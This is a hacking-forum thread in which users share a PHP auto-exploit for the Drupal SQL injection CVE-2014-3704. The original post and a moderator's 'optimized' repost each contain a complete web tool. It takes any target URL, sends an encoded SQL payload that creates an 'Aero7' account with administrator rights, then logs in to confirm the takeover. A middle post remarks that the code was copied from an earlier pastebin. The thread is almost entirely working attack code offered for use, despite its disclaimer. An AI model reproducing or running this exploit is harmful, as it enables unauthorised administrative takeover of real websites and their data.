Hello There, Guest! Login Register
Logo
Dismiss this notice
MaDLeeTs is not responsible for any attacks that are carried out on networks, websites or servers.
MaDLeeTs staff members cannot be held responsible.
All information on this forum is for educational purposes only.


[PHP] Drupal HTTP Parameter key SQL (CVE-2014-3704)

  • 0 Vote(s) - 0 Average


03-21-2017, 04:30 PM #1
aerow0rm Offline Newbie **
Registered
Posts:6 Threads:3 Joined:Mar 2017 Reputation: 0
Mood: Crackhead
Code:
<center><img src='http://i.imgur.com/N39PFcZ.png' height="150" width="150"></img><br><br>
<font face='courier' color=red size='+1'>
CVE-2014-3704 <br>by Aero7<br>Don't Change Right Noob</font><br><br>
<form method="POST"><strong></strong><input type="text" name="sub" value="http://localhost" ><input type="submit" name="send" value="Pwn!"></form><br></center>

<?php
// don't change right noob
if($_POST) {

$tar = $_POST['sub'];

$get = @file_get_contents("$tar/?q=user/login");

if(preg_match_all("#name=\"form_build_id\" value=\"(.*?)\" />#i",$get,$name)) {  

$tokens = $name[1];

foreach($tokens as $token){

}

$test = "name=Aero7&pass=dKMNrGsieC&form_build_id=$token&form_id=user_login&op=Log%20in";
$payload = "name%5b0%20%3binsert%20into%20users%20%28uid%2c%20name%2c%20pass%2c%20mail%2c%20status%29%20select%20max%28uid%29%2b1%2c%20%27Aero7%27%2c%20%27%24P\%248bxHyxnrtHg9WpndBMckxyzi.uGQfu/%27%2c%20%27test%40test.com%27%2c%201%20from%20users%3b%20insert%20into%20users_roles%20%28uid%2c%20rid%29%20VALUES%20%28%28select%20uid%20from%20users%20where%20name%3d%27Aero7%27%29%2c%20%28select%20rid%20from%20role%20where%20name%20%3d%20%27administrator%27%29%29%3b%20%23%20%5d=zcxmnTgToc&name%5b0%5d=ibWmQQZOCK&pass=dVCeuMFNMV&form_build_id=$token&form_id=user_login&op=Log%20in";

$ch = curl_init ($tar."/?q=user/login");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
curl_setopt ($ch, CURLOPT_POSTFIELDS, $payload);
$data = curl_exec ($ch);
curl_close($ch);

echo "<center> Payload Sent !</center>";
echo "<br> <center>Create NeW Account Admin <br></center>";

$ch1 = curl_init ($tar."/?q=user/login");
curl_setopt ($ch1, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch1, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch1, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch1, CURLOPT_POST, 1);
curl_setopt ($ch1, CURLOPT_POSTFIELDS, $test);
$data1 = curl_exec ($ch1);
curl_close($ch1);

if(eregi("/user/1",$data1) || eregi("/admin/",$data1) || eregi("/user/aero7",$data1) || eregi("/users/aero7",$data1))
{
       echo "<br> <center>SuccessFull <br>Account : Aero7:dKMNrGsieC<br></center>";
} else { echo "<br><center> Exploit Fail<br></center>"; }
} else { echo "<br><center>Exploit Fail<br> </center>"; }
}
?>

------------------------------------------------
[#] CodeName: Aero7
[#] Email: [email protected]

-------------------------------------------------
[Image: o8rq6s.jpg]

03-22-2017, 10:02 AM #2
CrashBandicot Offline MaDLeeTs LoVer *****
MaDLeeTs LoVer
Posts:104 Threads:15 Joined:Jul 2013 Reputation: 4
Mood: Zombie
:3 :3 now i'obfuscate my code , leecher in web is a very lot


original : http://pastebin.com/3psJNVtu (Posted the 8 December , 2014)

06-14-2017, 03:28 AM #3
T3N38R15 Offline ? lawless-coder *****
Moderators
Posts:812 Threads:48 Joined:Jan 2014 Reputation: 126
Mood: Fine
wink leeching is strong with this one ;D anyway here is the optimized version of it.
Code:
<html>
<head>
<title>Auto Exploit for Drupal - Aero7</title>
</head>
<body>
<center>
<img src='http://i.imgur.com/N39PFcZ.png' height="150" width="150">
<br><br>
<font face='courier' color=red size='+1'>
CVE-2014-3704 <br>by Aero7<br>
</font>
<br><br>
<form method="POST">
<input type="text" name="sub" value="http://localhost" >
<input type="submit" name="send" value="Pwn!">
</form>
<br>
</center>
<?php
if(!empty($_POST)) {
$site = $_POST['sub'];
$get = @file_get_contents("$site/?q=user/login");
if(preg_match_all("#name=\"form_build_id\" value=\"(.*?)\" />#i",$get,$name)) {  
$token = end($name[1]);
$test = "name=Aero7&pass=dKMNrGsieC&form_build_id=$token&form_id=user_login&op=Log%20in";
$payload = "name%5b0%20%3binsert%20into%20users%20%28uid%2c%20name%2c%20pass%2c%20mail%2c%20status%29%20select%20max%28uid%29%2b1%2c%20%27Aero7%27%2c%20%27%24P\%248bxHyxnrtHg9WpndBMckxyzi.uGQfu/%27%2c%20%27test%40test.com%27%2c%201%20from%20users%3b%20insert%20into%20users_roles%20%28uid%2c%20rid%29%20VALUES%20%28%28select%20uid%20from%20users%20where%20name%3d%27Aero7%27%29%2c%20%28select%20rid%20from%20role%20where%20name%20%3d%20%27administrator%27%29%29%3b%20%23%20%5d=zcxmnTgToc&name%5b0%5d=ibWmQQZOCK&pass=dVCeuMFNMV&form_build_id=$token&form_id=user_login&op=Log%20in";
$ch = curl_init ("$site/?q=user/login");
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
curl_setopt ($ch, CURLOPT_POSTFIELDS, $payload);
curl_exec($ch);
curl_close($ch);
echo "<center>
Payload Sent !
</center>
<br>
<center>
Create NeW Account Admin
</center>
<br>";
$ch1 = curl_init ("$site/?q=user/login");
curl_setopt ($ch1, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch1, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch1, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch1, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch1, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch1, CURLOPT_POST, 1);
curl_setopt ($ch1, CURLOPT_POSTFIELDS, $test);
$data1 = curl_exec ($ch1);
curl_close($ch1);
if(eregi("/user/1",$data1) || eregi("/admin/",$data1) || eregi("/user/aero7",$data1) || eregi("/users/aero7",$data1)){
echo "<br> <center>SuccessFull <br>Account : Aero7:dKMNrGsieC<br></center>";
}else{
echo "<br><center> Exploit Fail<br></center>";
}
}else{
echo "<br><center>Exploit Fail<br></center>";
}
}
?>
</body>
</html>

[Image: xodhvlpa.jpg]
[Image: test.php]






Forum Jump:


Users browsing this thread:1 Guest(s)